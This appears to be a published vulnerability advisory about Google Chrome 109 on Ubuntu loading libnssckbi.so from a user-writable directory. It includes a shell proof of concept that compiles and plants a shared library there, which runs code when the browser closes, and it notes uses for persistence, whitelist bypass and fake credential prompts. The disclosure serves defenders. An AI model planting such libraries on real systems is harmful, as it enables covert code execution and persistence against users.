Google Chrome version 109.0.5414.74 on Ubuntu attempts to load libnssckbi.so from a user-writable location and if missing, a replacement piece of malware can be used by an attacker to achieve code execution. Although privilege escalation is not likely as an attacker would already need access to the user's privilege level to place the malware, it could be a target for other malicious software leaving backdoors for persistence.
f717eb6fe35e231271a4dd4e77bba5c4985b8a2f9c10d2fb10a342b7a8064b5a
#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1
*Description*
Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `libnssckbi.so` in the specified path.
*exploit*
Following is the POC that could be used to reproduce the issue:
echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory is writable..."
echo "[+] Directory is writable..."
echo "[+] Generating malicious File libnssckbi.so ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
fi
fi
Upon closing the browser windows, the application executes the malicious code
*Impact*
The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.